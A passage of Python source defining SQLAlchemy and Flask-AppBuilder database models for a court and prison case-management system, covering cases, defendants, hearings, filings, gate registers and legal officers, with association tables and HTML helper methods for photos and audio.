        secondary='case_polofficer',
        backref=u'polofficer_polofficer_cases_0')
    polofficer2 = relationship(
        u'Polofficer',
        secondary='caseinvestigation',
        backref=u'polofficer_polofficer_cases_1')
    casecategory = relationship(
        u'Casecategory', secondary='case_casecategory', backref=u'cases')
    defendant = relationship(
        u'Defendant', secondary='case_defendant', backref=u'cases')
    prosecutor = relationship(
        u'Prosecutor', secondary='case_prosecutor', backref=u'prosecutor_cases')
    tag = relationship(u'Tag', secondary='case_tag', backref=u'cases')
    plaintiff = relationship(
        u'Plaintiff', secondary='case_plaintiff', backref=u'cases')
    witness = relationship(
        u'Witnes', secondary='case_witness', backref=u'cases')
    prosecutor1 = relationship(
        u'Prosecutor',
        secondary='case_prosecutor_2',
        backref=u'prosecutor_cases_0')
    causeofaction = relationship(
        u'Causeofaction', secondary='case_causeofaction', backref=u'cases')
# Association tables: many-to-many links from Case to its related entities.
case_casecategory = Table('case_casecategory', Model.metadata,
                          Column(
                              'case',
                              ForeignKey(u'case.id'),
                              primary_key=True,
                              nullable=False),
                          Column(
                              'casecategory',
                              ForeignKey(u'casecategory.id'),
                              primary_key=True,
                              nullable=False,
                              index=True))
# Case <-> Causeofaction
case_causeofaction = Table('case_causeofaction', Model.metadata,
                           Column(
                               'case',
                               ForeignKey(u'case.id'),
                               primary_key=True,
                               nullable=False),
                           Column(
                               'causeofaction',
                               ForeignKey(u'causeofaction.id'),
                               primary_key=True,
                               nullable=False,
                               index=True))
# Case <-> Defendant
case_defendant = Table('case_defendant', Model.metadata,
                       Column(
                           'case',
                           ForeignKey(u'case.id'),
                           primary_key=True,
                           nullable=False),
                       Column(
                           'defendant',
                           ForeignKey(u'defendant.id'),
                           primary_key=True,
                           nullable=False,
                           index=True))
# Case <-> Natureofsuit
case_natureofsuit = Table('case_natureofsuit', Model.metadata,
                          Column(
                              'case',
                              ForeignKey(u'case.id'),
                              primary_key=True,
                              nullable=False),
                          Column(
                              'natureofsuit',
                              ForeignKey(u'natureofsuit.id'),
                              primary_key=True,
                              nullable=False,
                              index=True))
# Case <-> Plaintiff
case_plaintiff = Table('case_plaintiff', Model.metadata,
                       Column(
                           'case',
                           ForeignKey(u'case.id'),
                           primary_key=True,
                           nullable=False),
                       Column(
                           'plaintiff',
                           ForeignKey(u'plaintiff.id'),
                           primary_key=True,
                           nullable=False,
                           index=True))
# Case <-> Polofficer
case_polofficer = Table('case_polofficer', Model.metadata,
                        Column(
                            'case',
                            ForeignKey(u'case.id'),
                            primary_key=True,
                            nullable=False),
                        Column(
                            'polofficer',
                            ForeignKey(u'polofficer.id'),
                            primary_key=True,
                            nullable=False,
                            index=True))
# Case <-> Prosecutor (primary assignment)
case_prosecutor = Table('case_prosecutor', Model.metadata,
                        Column(
                            'case',
                            ForeignKey(u'case.id'),
                            primary_key=True,
                            nullable=False),
                        Column(
                            'prosecutor',
                            ForeignKey(u'prosecutor.id'),
                            primary_key=True,
                            nullable=False,
                            index=True))
# Case <-> Prosecutor (secondary assignment; backs Case.prosecutor1)
case_prosecutor_2 = Table('case_prosecutor_2', Model.metadata,
                          Column(
                              'case',
                              ForeignKey(u'case.id'),
                              primary_key=True,
                              nullable=False),
                          Column(
                              'prosecutor',
                              ForeignKey(u'prosecutor.id'),
                              primary_key=True,
                              nullable=False,
                              index=True))
# Case <-> Tag
case_tag = Table('case_tag', Model.metadata,
                 Column(
                     'case',
                     ForeignKey(u'case.id'),
                     primary_key=True,
                     nullable=False),
                 Column(
                     'tag',
                     ForeignKey(u'tag.id'),
                     primary_key=True,
                     nullable=False,
                     index=True))
# Case <-> Witnes (note: the Witness model class is spelled 'Witnes')
case_witness = Table('case_witness', Model.metadata,
                     Column(
                         'case',
                         ForeignKey(u'case.id'),
                         primary_key=True,
                         nullable=False),
                     Column(
                         'witness',
                         ForeignKey(u'witness.id'),
                         primary_key=True,
                         nullable=False,
                         index=True))
class Casecategory(RefTypeMixin, AuditMixin, Model):
    """Lookup table of case categories."""
    __versioned__ = {}  # row history tracked by sqlalchemy-continuum
    __tablename__ = 'casecategory'
    id = Column(Integer, primary_key=True, autoincrement=True)
    indictable = Column(Boolean)
    is_criminal = Column(Boolean, default=True)
# Association table: investigating officers assigned to cases
# (backs Case.polofficer2).
caseinvestigation = Table('caseinvestigation', Model.metadata,
                          Column(
                              'pol_officers',
                              ForeignKey(u'polofficer.id'),
                              primary_key=True,
                              nullable=False),
                          Column(
                              'cases',
                              ForeignKey(u'case.id'),
                              primary_key=True,
                              nullable=False,
                              index=True))
class Causeofaction(RefTypeMixin, AuditMixin, Model):
    """Cause of action; forms a self-referencing tree via parent_coa."""
    __versioned__ = {}
    __tablename__ = 'causeofaction'
    id = Column(Integer, primary_key=True, autoincrement=True)
    # Distinguishes criminal from non-criminal causes.
    criminal = Column(Boolean, nullable=False)
    # Optional parent cause (adjacency-list hierarchy).
    parent_coa = Column(ForeignKey(u'causeofaction.id'), index=True)
    parent = relationship(
        u'Causeofaction',
        remote_side=[id],
        primaryjoin='Causeofaction.parent_coa == Causeofaction.id',
        backref=u'causeofactions')
    # M2M links to filings and hearings via association tables.
    filing = relationship(
        u'Filing', secondary='causeofaction_filing', backref=u'causeofactions')
    hearing = relationship(
        u'Hearing',
        secondary='causeofaction_hearing',
        backref=u'causeofactions')
# M2M link: causes of action <-> filings.
causeofaction_filing = Table(
    'causeofaction_filing', Model.metadata,
    Column('causeofaction', ForeignKey(u'causeofaction.id'), primary_key=True,
           nullable=False),
    Column('filing', ForeignKey(u'filing.id'), primary_key=True,
           nullable=False, index=True))

# M2M link: causes of action <-> hearings.
causeofaction_hearing = Table(
    'causeofaction_hearing', Model.metadata,
    Column('causeofaction', ForeignKey(u'causeofaction.id'), primary_key=True,
           nullable=False),
    Column('hearing', ForeignKey(u'hearing.id'), primary_key=True,
           nullable=False, index=True))
class Commitaltype(RefTypeMixin, AuditMixin, Model):
    """Reference model for prison commital types."""
    __versioned__ = {}
    __tablename__ = 'commitaltype'
    id = Column(Integer, primary_key=True, autoincrement=True)
    # M2M to Prisoncommital (which has a composite PK — see the
    # commitaltype_prisoncommital association table).
    prisoncommital = relationship(
        u'Prisoncommital',
        secondary='commitaltype_prisoncommital',
        backref=u'commitaltypes')
# M2M link: commital types <-> prison commitals. Prisoncommital has a
# composite primary key (prison, warrantno), hence the two FK columns plus a
# composite ForeignKeyConstraint and covering index.
commitaltype_prisoncommital = Table(
    'commitaltype_prisoncommital', Model.metadata,
    Column('commitaltype', ForeignKey(u'commitaltype.id'), primary_key=True,
           nullable=False),
    Column('prisoncommital_prison', Integer, primary_key=True, nullable=False),
    Column('prisoncommital_warrantno', String(100), primary_key=True,
           nullable=False),
    ForeignKeyConstraint(
        ['prisoncommital_prison', 'prisoncommital_warrantno'],
        [u'prisoncommital.prison', u'prisoncommital.warrantno']),
    Index('idx_commitaltype_prisoncommital', 'prisoncommital_prison',
          'prisoncommital_warrantno'))
class Constituency(RefTypeMixin, AuditMixin, Model):
    """Electoral constituency, located in a county and optionally a town."""
    __versioned__ = {}
    __tablename__ = 'constituency'
    id = Column(Integer, primary_key=True, autoincrement=True)
    county = Column(ForeignKey(u'county.id'), nullable=False, index=True)
    town = Column(ForeignKey(u'town.id'), index=True)
    county1 = relationship(
        u'County',
        primaryjoin='Constituency.county == County.id',
        backref=u'constituencies')
    town1 = relationship(
        u'Town',
        primaryjoin='Constituency.town == Town.id',
        backref=u'constituencies')

    def __repr__(self):
        # Display the constituency by its name (field from RefTypeMixin,
        # presumably — confirm mixin definition).
        return self.name
class County(AuditMixin, RefTypeMixin, Model):
    """County reference model."""
    __versioned__ = {}
    __tablename__ = 'county'
    id = Column(Integer, primary_key=True, autoincrement=True)

    def __repr__(self):
        # Display the county by name.
        return self.name
class Court(PlaceMixin, RefTypeMixin, AuditMixin, Model):
    """A court room/bench, belonging to a court station."""
    __versioned__ = {}
    __tablename__ = 'court'
    id = Column(Integer, primary_key=True, autoincrement=True)
    court_station = Column(
        ForeignKey(u'courtstation.id'), nullable=False, index=True)
    courtstation = relationship(
        u'Courtstation',
        primaryjoin='Court.court_station == Courtstation.id',
        backref=u'courts')

    def __repr__(self):
        # Display the court by name.
        return self.name
class Courtlevel(RefTypeMixin, AuditMixin, Model):
    """Court level reference model (lookup)."""
    __versioned__ = {}
    __tablename__ = 'courtlevel'
    id = Column(Integer, primary_key=True, autoincrement=True)

    def __repr__(self):
        # Display the level by name.
        return self.name
class Courtstation(PlaceMixin, AuditMixin, Model):
    """A court station: physical site with a level, town and staff names."""
    __versioned__ = {}
    __tablename__ = 'courtstation'
    id = Column(Integer, primary_key=True, autoincrement=True)
    # Names of the resident magistrate and (mandatory) registrar.
    residentmagistrate = Column(String(100))
    registrar = Column(String(100), nullable=False)
    court_level = Column(
        ForeignKey(u'courtlevel.id'), nullable=False, index=True)
    # Number of court rooms at this station.
    num_of_courts = Column(Integer)
    town = Column(ForeignKey(u'town.id'), nullable=False, index=True)
    courtlevel = relationship(
        u'Courtlevel',
        primaryjoin='Courtstation.court_level == Courtlevel.id',
        backref=u'courtstations')
    town1 = relationship(
        u'Town',
        primaryjoin='Courtstation.town == Town.id',
        backref=u'courtstations')

    def __repr__(self):
        # Display by place name (field provided by PlaceMixin).
        return self.place_name
class Defendant(PersonMedicalMixin, PersonDocMixin, BiometricMixin,
                EmploymentMixin, PersonMixin, ContactMixin, AuditMixin, Model):
    """Accused person; person/contact/biometric fields come from the mixins."""
    __versioned__ = {}
    __tablename__ = 'defendant'

    def ViewName(self):
        """Return the Flask-AppBuilder view name, e.g. 'DefendantView'."""
        return self.__class__.__name__ + 'View'

    def photo_img(self):
        """Return Markup with the full-size photo linked to the show view.

        Falls back to an empty-src placeholder image when no photo is stored.
        """
        im = ImageManager()
        vn = self.ViewName()
        if self.photo:
            return Markup(
                '<a href="' + url_for(vn + '.show', pk=str(self.id)) +
                '" class="thumbnail"><img src="' + im.get_url(self.photo) +
                '" alt="Photo" class="img-rounded img-responsive"></a>')
        else:
            return Markup(
                '<a href="' + url_for(vn, pk=str(self.id)) +
                '" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
            )

    def photo_img_thumbnail(self):
        """Return Markup with the thumbnail photo linked to the show view."""
        im = ImageManager()
        vn = self.ViewName()
        if self.photo:
            return Markup(
                '<a href="' + url_for(vn + '.show', pk=str(self.id)) +
                '" class="thumbnail"><img src="' +
                im.get_url_thumbnail(self.photo) +
                '" alt="Photo" class="img-rounded img-responsive"></a>')
        else:
            return Markup(
                '<a href="' + url_for(vn, pk=str(self.id)) +
                '" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
            )

    def print_button(self):
        """Return Markup for a print button linking to this record's view."""
        vn = self.ViewName()
        return Markup(
            '<a href="' + url_for(vn) +
            '" class="btn btn-sm btn-primary" data-toggle="tooltip" rel="tooltip"'
            + 'title="Print">' + '<i class="fa fa-edit"></i>' + '</a>')

    def audio_play(self):
        """Return Markup for an HTML5 audio player for this record.

        Bug fix: the '>' closing the <source> tag sat outside the string
        literal ("...mpeg\"" > + '<i...'), which parsed as a comparison with
        unary plus applied to a str and raised TypeError at call time. The
        '>' now lives inside the literal.
        """
        vn = self.ViewName()
        return Markup(
            '<audio controls autoplay>' + '<source src="' + url_for(vn) +
            '" type="audio/mpeg">' + '<i class="fa fa-volume-up"></i>' +
            'Your browser does not support the audio element.' + '</audio>')

    id = Column(Integer, primary_key=True, autoincrement=True)
    # True when the defendant is a minor.
    juvenile = Column(Boolean)
    gender = Column(ForeignKey(u'gender.id'), nullable=False, index=True)
    prisoncell = Column(
        ForeignKey(u'prisoncell.id'), nullable=False, index=True)
    # Number of cases associated with this defendant.
    casecount = Column(Integer)
    gender1 = relationship(
        u'Gender',
        primaryjoin='Defendant.gender == Gender.id',
        backref=u'defendants')
    prisoncell1 = relationship(
        u'Prisoncell',
        primaryjoin='Defendant.prisoncell == Prisoncell.id',
        backref=u'defendants')
    # M2M links via association tables defined below at module level.
    medevent = relationship(
        u'Medevent', secondary='defendant_medevent', backref=u'defendants')
    gateregister = relationship(
        u'Gateregister',
        secondary='defendant_gateregister',
        backref=u'defendants')
    hearing = relationship(
        u'Hearing', secondary='defendant_hearing', backref=u'defendants')
# M2M links between Defendant and gate-register, hearing and medical-event
# records.
defendant_gateregister = Table(
    'defendant_gateregister', Model.metadata,
    Column('defendant', ForeignKey(u'defendant.id'), primary_key=True,
           nullable=False),
    Column('gateregister', ForeignKey(u'gateregister.id'), primary_key=True,
           nullable=False, index=True))

defendant_hearing = Table(
    'defendant_hearing', Model.metadata,
    Column('defendant', ForeignKey(u'defendant.id'), primary_key=True,
           nullable=False),
    Column('hearing', ForeignKey(u'hearing.id'), primary_key=True,
           nullable=False, index=True))

defendant_medevent = Table(
    'defendant_medevent', Model.metadata,
    Column('defendant', ForeignKey(u'defendant.id'), primary_key=True,
           nullable=False),
    Column('medevent', ForeignKey(u'medevent.id'), primary_key=True,
           nullable=False, index=True))
class Discipline(ActivityMixin, AuditMixin, Model):
    """Disciplinary record tied to a defendant."""
    __versioned__ = {}
    __tablename__ = 'discipline'
    id = Column(Integer, primary_key=True, autoincrement=True)
    defendant = Column(ForeignKey(u'defendant.id'), nullable=False, index=True)
    defendant1 = relationship(
        u'Defendant',
        primaryjoin='Discipline.defendant == Defendant.id',
        backref=u'disciplines')
class Docarchive(AuditMixin, Model):
    """Archived scanned document, taggable via the docarchive_tag table."""
    __versioned__ = {}
    __tablename__ = 'docarchive'
    id = Column(Integer, primary_key=True, autoincrement=True)
    name = Column(Text)
    # Document content/reference (exact format not visible here — confirm).
    doc = Column(Text)
    # When the document was scanned; defaults to insertion time.
    scandate = Column(DateTime, default=func.now())
    archival = Column(Boolean, default=True)
    tag = relationship(
        u'Tag', secondary='docarchive_tag', backref=u'docarchives')
# M2M link: archived documents <-> tags.
docarchive_tag = Table(
    'docarchive_tag', Model.metadata,
    Column('docarchive', ForeignKey(u'docarchive.id'), primary_key=True,
           nullable=False),
    Column('tag', ForeignKey(u'tag.id'), primary_key=True, nullable=False,
           index=True))
class Doctemplate(DocMixin, RefTypeMixin, AuditMixin, Model):
    """Document template; content fields come from DocMixin."""
    __versioned__ = {}
    __tablename__ = 'doctemplate'
    id = Column(Integer, primary_key=True, autoincrement=True)
class Document(DocMixin, AuditMixin, Model):
    """A filed document, optionally derived from a template and taggable."""
    __versioned__ = {}
    __tablename__ = 'document'
    id = Column(Integer, primary_key=True, autoincrement=True)
    filing = Column(ForeignKey(u'filing.id'), nullable=False, index=True)
    doc_template = Column(ForeignKey(u'doctemplate.id'), index=True)
    confidential = Column(Boolean)
    pagecount = Column(Integer)
    locked = Column(Boolean)
    # Content hash (algorithm not visible here — confirm producer).
    hash = Column(Text)
    doctemplate = relationship(
        u'Doctemplate',
        primaryjoin='Document.doc_template == Doctemplate.id',
        backref=u'documents')
    filing1 = relationship(
        u'Filing',
        primaryjoin='Document.filing == Filing.id',
        backref=u'documents')
    tag = relationship(u'Tag', secondary='document_tag', backref=u'documents')
# M2M link: documents <-> tags.
document_tag = Table(
    'document_tag', Model.metadata,
    Column('document', ForeignKey(u'document.id'), primary_key=True,
           nullable=False),
    Column('tag', ForeignKey(u'tag.id'), primary_key=True, nullable=False,
           index=True))
class Eventlog(AuditMixin, Model):
    """Audit/event log row: what happened, where, and before/after values."""
    __versioned__ = {}
    __tablename__ = 'eventlog'
    id = Column(Integer, primary_key=True, autoincrement=True)
    # Event timestamp; defaults to insertion time.
    temporal = Column(DateTime, default=func.now())
    event = Column(Text)
    severity = Column(Integer)
    alert = Column(Boolean)
    notes = Column(Text)
    # Table/column the event refers to, with the old and new values.
    tbl = Column(Text)
    colname = Column(Text)
    colbefore = Column(Text)
    colafter = Column(Text)
class Filing(AuditMixin, Model):
    """A court filing with its fee/payment state and the filing parties."""
    __versioned__ = {}
    __tablename__ = 'filing'
    id = Column(Integer, primary_key=True, autoincrement=True)
    uploaddate = Column(DateTime, default=func.now())
    pagecount = Column(Integer)
    # Fee amounts in currency units (12,2 precision).
    totalfees = Column(Numeric(12, 2), nullable=False)
    filing_attorney = Column(
        ForeignKey(u'lawyers.id'), nullable=False, index=True)
    filing_prosecutor = Column(
        ForeignKey(u'prosecutor.id'), nullable=False, index=True)
    assessedfees = Column(Numeric(12, 2))
    receiptverified = Column(Boolean, default=False)
    amountpaid = Column(Numeric(12, 2), default=0.00)
    feebalance = Column(Numeric(12, 2), default=0.00)
    paymenthistory = Column(Text, nullable=False)
    case = Column(ForeignKey(u'case.id'), nullable=False, index=True)
    # Urgent filings carry a mandatory-in-practice reason text.
    urgent = Column(Boolean, default=False)
    urgentreason = Column(Text)
    case1 = relationship(
        u'Case', primaryjoin='Filing.case == Case.id', backref=u'filings')
    lawyer = relationship(
        u'Lawyer',
        primaryjoin='Filing.filing_attorney == Lawyer.id',
        backref=u'filings')
    prosecutor = relationship(
        u'Prosecutor',
        primaryjoin='Filing.filing_prosecutor == Prosecutor.id',
        backref=u'filings')
    payment = relationship(
        u'Payment', secondary='filing_payment', backref=u'filings')
    filingtype = relationship(
        u'Filingtype', secondary='filing_filingtype', backref=u'filings')
# M2M links between Filing and its types/payments.
filing_filingtype = Table(
    'filing_filingtype', Model.metadata,
    Column('filing', ForeignKey(u'filing.id'), primary_key=True,
           nullable=False),
    Column('filingtype', ForeignKey(u'filingtype.id'), primary_key=True,
           nullable=False, index=True))

filing_payment = Table(
    'filing_payment', Model.metadata,
    Column('filing', ForeignKey(u'filing.id'), primary_key=True,
           nullable=False),
    Column('payment', ForeignKey(u'payment.id'), primary_key=True,
           nullable=False, index=True))
class Filingtype(RefTypeMixin, AuditMixin, Model):
    """Filing type reference, with its fee schedule."""
    __versioned__ = {}
    __tablename__ = 'filingtype'
    id = Column(Integer, primary_key=True, autoincrement=True)
    # Flat fee and per-page cost; paid_per_page selects which applies.
    fees = Column(Numeric(12, 2), default=0.00)
    perpagecost = Column(Numeric(12, 2), default=0.00)
    paid_per_page = Column(Boolean, default=False)
class Gateregister(AuditMixin, Model):
    """Prison gate log entry: who/what moved through and when."""
    __versioned__ = {}
    __tablename__ = 'gateregister'
    id = Column(Integer, primary_key=True, autoincrement=True)
    prison = Column(ForeignKey(u'prison.id'), nullable=False, index=True)
    opentime = Column(DateTime, default=func.now())
    closedtime = Column(DateTime, default=func.now())
    # PostgreSQL INTERVAL: how long the gate stayed open.
    openduration = Column(INTERVAL)
    # Direction flag (in vs. out — exact encoding not visible here; confirm).
    movementdirection = Column(Boolean)
    reason = Column(Text)
    staffmovement = Column(Boolean)
    goodsmovement = Column(Text, nullable=False)
    vehicle_reg = Column(Text)
    vehicle_color = Column(Text, nullable=False)
    prison1 = relationship(
        u'Prison',
        primaryjoin='Gateregister.prison == Prison.id',
        backref=u'gateregisters')
    # NOTE(review): `warder` uses gateregister_warder_2 while `warder1` uses
    # gateregister_warder — the pairing looks swapped relative to the naming;
    # verify against the intended schema before relying on either.
    warder = relationship(
        u'Warder',
        secondary='gateregister_warder_2',
        backref=u'warder_gateregisters')
    warder1 = relationship(
        u'Warder',
        secondary='gateregister_warder',
        backref=u'warder_gateregisters_0')
# Two parallel M2M links between gate-register entries and warders.
gateregister_warder = Table(
    'gateregister_warder', Model.metadata,
    Column('gateregister', ForeignKey(u'gateregister.id'), primary_key=True,
           nullable=False),
    Column('warder', ForeignKey(u'warder.id'), primary_key=True,
           nullable=False, index=True))

gateregister_warder_2 = Table(
    'gateregister_warder_2', Model.metadata,
    Column('gateregister', ForeignKey(u'gateregister.id'), primary_key=True,
           nullable=False),
    Column('warder', ForeignKey(u'warder.id'), primary_key=True,
           nullable=False, index=True))
class Gender(RefTypeMixin, AuditMixin, Model):
    """Gender lookup with a unique name."""
    __versioned__ = {}
    __tablename__ = 'gender'
    id = Column(Integer, primary_key=True, autoincrement=True)
    name = Column(String(20), nullable=False, unique=True)

    def __init__(self, name):
        """Create a gender row with the given unique name."""
        self.name = name
class Hearing(ActivityMixin, AuditMixin, Model):
    """A court hearing for a case, with remand state and participants."""
    __versioned__ = {}
    __tablename__ = 'hearing'
    id = Column(Integer, primary_key=True, autoincrement=True)
    hearingdate = Column(DateTime, nullable=False, default=func.now())
    adjourned = Column(Boolean, default=False)
    completed = Column(Boolean, default=False)
    case = Column(ForeignKey(u'case.id'), nullable=False, index=True)
    court = Column(ForeignKey(u'court.id'), nullable=False, index=True)
    remandwarrant = Column(Text)
    hearing_type = Column(
        ForeignKey(u'hearingtype.id'), nullable=False, index=True)
    # Remand bookkeeping: duration, start, and warrant expiry.
    remanddays = Column(Integer)
    remanddate = Column(Date)
    remandwarrantexpirydate = Column(Date)
    nexthearingdate = Column(Date)
    finalhearing = Column(Boolean, nullable=False)
    transcript = Column(Text)
    # Media stored via Flask-AppBuilder's ImageColumn.
    audio = Column(ImageColumn)
    video = Column(ImageColumn)
    case1 = relationship(
        u'Case', primaryjoin='Hearing.case == Case.id', backref=u'hearings')
    court1 = relationship(
        u'Court', primaryjoin='Hearing.court == Court.id', backref=u'hearings')
    hearingtype = relationship(
        u'Hearingtype',
        primaryjoin='Hearing.hearing_type == Hearingtype.id',
        backref=u'hearings')
    # M2M participant links via association tables.
    prosecutor = relationship(
        u'Prosecutor', secondary='hearing_prosecutor', backref=u'hearings')
    lawyers = relationship(
        u'Lawyer', secondary='hearing_lawyers', backref=u'hearings')
    judicialofficer = relationship(
        u'Judicialofficer',
        secondary='hearing_judicialofficer',
        backref=u'hearings')
    polofficer = relationship(
        u'Polofficer', secondary='hearing_polofficer', backref=u'hearings')
    # NOTE(review): 'Witnes' (single s) is presumably the generated class name
    # for the witness table — confirm it matches the class defined elsewhere.
    witness = relationship(
        u'Witnes', secondary='hearing_witness', backref=u'hearings')
    tag = relationship(u'Tag', secondary='hearing_tag', backref=u'hearings')
# M2M association tables between Hearing and its participants/tags.
hearing_judicialofficer = Table(
    'hearing_judicialofficer', Model.metadata,
    Column('hearing', ForeignKey(u'hearing.id'), primary_key=True,
           nullable=False),
    Column('judicialofficer', ForeignKey(u'judicialofficer.id'),
           primary_key=True, nullable=False, index=True))

hearing_lawyers = Table(
    'hearing_lawyers', Model.metadata,
    Column('hearing', ForeignKey(u'hearing.id'), primary_key=True,
           nullable=False),
    Column('lawyers', ForeignKey(u'lawyers.id'), primary_key=True,
           nullable=False, index=True))

hearing_polofficer = Table(
    'hearing_polofficer', Model.metadata,
    Column('hearing', ForeignKey(u'hearing.id'), primary_key=True,
           nullable=False),
    Column('polofficer', ForeignKey(u'polofficer.id'), primary_key=True,
           nullable=False, index=True))

hearing_prosecutor = Table(
    'hearing_prosecutor', Model.metadata,
    Column('hearing', ForeignKey(u'hearing.id'), primary_key=True,
           nullable=False),
    Column('prosecutor', ForeignKey(u'prosecutor.id'), primary_key=True,
           nullable=False, index=True))

hearing_tag = Table(
    'hearing_tag', Model.metadata,
    Column('hearing', ForeignKey(u'hearing.id'), primary_key=True,
           nullable=False),
    Column('tag', ForeignKey(u'tag.id'), primary_key=True, nullable=False,
           index=True))

hearing_witness = Table(
    'hearing_witness', Model.metadata,
    Column('hearing', ForeignKey(u'hearing.id'), primary_key=True,
           nullable=False),
    Column('witness', ForeignKey(u'witness.id'), primary_key=True,
           nullable=False, index=True))
class Hearingtype(RefTypeMixin, AuditMixin, Model):
    """Hearing type reference model (lookup)."""
    __versioned__ = {}
    __tablename__ = 'hearingtype'
    id = Column(Integer, primary_key=True, autoincrement=True)
class Investigation(PlaceMixin, AuditMixin, Model):
    """Investigation record for a case: evidence, narrative, scene details."""
    __versioned__ = {}
    __tablename__ = 'investigation'
    id = Column(Integer, primary_key=True, autoincrement=True)
    case = Column(ForeignKey(u'case.id'), nullable=False, index=True)
    actiondate = Column(DateTime, default=func.now())
    evidence = Column(Text, nullable=False)
    narrative = Column(Text, nullable=False)
    # Scene conditions recorded as free text.
    weather = Column(Text, nullable=False)
    location = Column(Text, nullable=False)
    case1 = relationship(
        u'Case',
        primaryjoin='Investigation.case == Case.id',
        backref=u'investigations')
    polofficer = relationship(
        u'Polofficer',
        secondary='investigation_polofficer',
        backref=u'investigations')
    # 'Witnes' spelling presumably matches the generated witness class — confirm.
    witness = relationship(
        u'Witnes', secondary='investigation_witness', backref=u'investigations')
# M2M links between Investigation and police officers / witnesses.
investigation_polofficer = Table(
    'investigation_polofficer', Model.metadata,
    Column('investigation', ForeignKey(u'investigation.id'), primary_key=True,
           nullable=False),
    Column('polofficer', ForeignKey(u'polofficer.id'), primary_key=True,
           nullable=False, index=True))

investigation_witness = Table(
    'investigation_witness', Model.metadata,
    Column('investigation', ForeignKey(u'investigation.id'), primary_key=True,
           nullable=False),
    Column('witness', ForeignKey(u'witness.id'), primary_key=True,
           nullable=False, index=True))
class JoRank(RefTypeMixin, AuditMixin, Model):
    """Judicial officer rank, with formal and informal forms of address."""
    __versioned__ = {}
    __tablename__ = 'jo_rank'
    id = Column(Integer, primary_key=True, autoincrement=True)
    # Formal title ("appelation") and informal address for the rank.
    appelation = Column(Text, nullable=False)
    informaladdress = Column(Text, nullable=False)
class Judicialofficer(PersonMixin, ContactMixin, AuditMixin, Model):
    """Judicial officer (magistrate/judge) assigned to a court."""
    __versioned__ = {}
    __tablename__ = 'judicialofficer'

    def ViewName(self):
        """Return the Flask-AppBuilder view name, e.g. 'JudicialofficerView'."""
        return self.__class__.__name__ + 'View'

    def photo_img(self):
        """Return Markup with the full-size photo linked to the show view."""
        im = ImageManager()
        vn = self.ViewName()
        if self.photo:
            return Markup(
                '<a href="' + url_for(vn + '.show', pk=str(self.id)) +
                '" class="thumbnail"><img src="' + im.get_url(self.photo) +
                '" alt="Photo" class="img-rounded img-responsive"></a>')
        else:
            return Markup(
                '<a href="' + url_for(vn, pk=str(self.id)) +
                '" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
            )

    def photo_img_thumbnail(self):
        """Return Markup with the thumbnail photo linked to the show view."""
        im = ImageManager()
        vn = self.ViewName()
        if self.photo:
            return Markup(
                '<a href="' + url_for(vn + '.show', pk=str(self.id)) +
                '" class="thumbnail"><img src="' +
                im.get_url_thumbnail(self.photo) +
                '" alt="Photo" class="img-rounded img-responsive"></a>')
        else:
            return Markup(
                '<a href="' + url_for(vn, pk=str(self.id)) +
                '" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
            )

    def print_button(self):
        """Return Markup for a print button linking to this record's view."""
        vn = self.ViewName()
        return Markup(
            '<a href="' + url_for(vn) +
            '" class="btn btn-sm btn-primary" data-toggle="tooltip" rel="tooltip"'
            + 'title="Print">' + '<i class="fa fa-edit"></i>' + '</a>')

    def audio_play(self):
        """Return Markup for an HTML5 audio player for this record.

        Bug fix: the '>' closing the <source> tag sat outside the string
        literal, which applied unary plus to a str and raised TypeError at
        call time; it now lives inside the literal.
        """
        vn = self.ViewName()
        return Markup(
            '<audio controls autoplay>' + '<source src="' + url_for(vn) +
            '" type="audio/mpeg">' + '<i class="fa fa-volume-up"></i>' +
            'Your browser does not support the audio element.' + '</audio>')

    id = Column(Integer, primary_key=True, autoincrement=True)
    j_o__rank = Column(ForeignKey(u'jo_rank.id'), nullable=False, index=True)
    gender = Column(ForeignKey(u'gender.id'), index=True)
    court = Column(ForeignKey(u'court.id'), nullable=False, index=True)
    court1 = relationship(
        u'Court',
        primaryjoin='Judicialofficer.court == Court.id',
        backref=u'judicialofficers')
    gender1 = relationship(
        u'Gender',
        primaryjoin='Judicialofficer.gender == Gender.id',
        backref=u'judicialofficers')
    jo_rank = relationship(
        u'JoRank',
        primaryjoin='Judicialofficer.j_o__rank == JoRank.id',
        backref=u'judicialofficers')
class Lawfirm(PlaceMixin, RefTypeMixin, AuditMixin, Model):
    """Law firm reference model with place fields from PlaceMixin."""
    __versioned__ = {}
    __tablename__ = 'lawfirm'
    id = Column(Integer, primary_key=True, autoincrement=True)
class Lawyer(PersonMixin, ContactMixin, AuditMixin, Model):
    """Attorney record; note the table name is plural ('lawyers')."""
    __versioned__ = {}
    __tablename__ = 'lawyers'

    def ViewName(self):
        """Return the Flask-AppBuilder view name, e.g. 'LawyerView'."""
        return self.__class__.__name__ + 'View'

    def photo_img(self):
        """Return Markup with the full-size photo linked to the show view."""
        im = ImageManager()
        vn = self.ViewName()
        if self.photo:
            return Markup(
                '<a href="' + url_for(vn + '.show', pk=str(self.id)) +
                '" class="thumbnail"><img src="' + im.get_url(self.photo) +
                '" alt="Photo" class="img-rounded img-responsive"></a>')
        else:
            return Markup(
                '<a href="' + url_for(vn, pk=str(self.id)) +
                '" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
            )

    def photo_img_thumbnail(self):
        """Return Markup with the thumbnail photo linked to the show view."""
        im = ImageManager()
        vn = self.ViewName()
        if self.photo:
            return Markup(
                '<a href="' + url_for(vn + '.show', pk=str(self.id)) +
                '" class="thumbnail"><img src="' +
                im.get_url_thumbnail(self.photo) +
                '" alt="Photo" class="img-rounded img-responsive"></a>')
        else:
            return Markup(
                '<a href="' + url_for(vn, pk=str(self.id)) +
                '" class="thumbnail"><img src="//:0" alt="Photo" class="img-responsive"></a>'
            )

    def print_button(self):
        """Return Markup for a print button linking to this record's view."""
        vn = self.ViewName()
        return Markup(
            '<a href="' + url_for(vn) +
            '" class="btn btn-sm btn-primary" data-toggle="tooltip" rel="tooltip"'
            + 'title="Print">' + '<i class="fa fa-edit"></i>' + '</a>')

    def audio_play(self):
        """Return Markup for an HTML5 audio player for this record.

        Bug fix: the '>' closing the <source> tag sat outside the string
        literal, which applied unary plus to a str and raised TypeError at
        call time; it now lives inside the literal.
        """
        vn = self.ViewName()
        return Markup(
            '<audio controls autoplay>' + '<source src="' + url_for(vn) +
